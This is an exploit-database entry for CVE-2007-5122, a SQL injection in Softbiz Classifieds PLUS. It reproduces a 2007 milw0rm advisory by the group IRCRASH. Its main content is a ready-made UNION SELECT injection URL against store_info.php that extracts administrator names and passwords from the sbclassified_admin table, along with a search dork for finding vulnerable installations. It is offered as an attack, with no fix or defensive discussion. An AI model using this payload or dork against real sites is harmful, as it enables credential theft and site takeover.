Exploit Softbiz Classifieds PLUS - 'id' SQL Injection

[Exploiter]

EDB-ID

4457

Проверка EDB

1. Пройдено

Автор

KHASHAYAR FEREIDANI

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5122

Дата публикации

2007-09-26

##################################################$##################################
####                        Classifieds SQL INJECTION                            ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.w0rm & Dr.Crash)                                             #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:store_info.php                             #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://server.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*
#                                                                                   #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-09-26]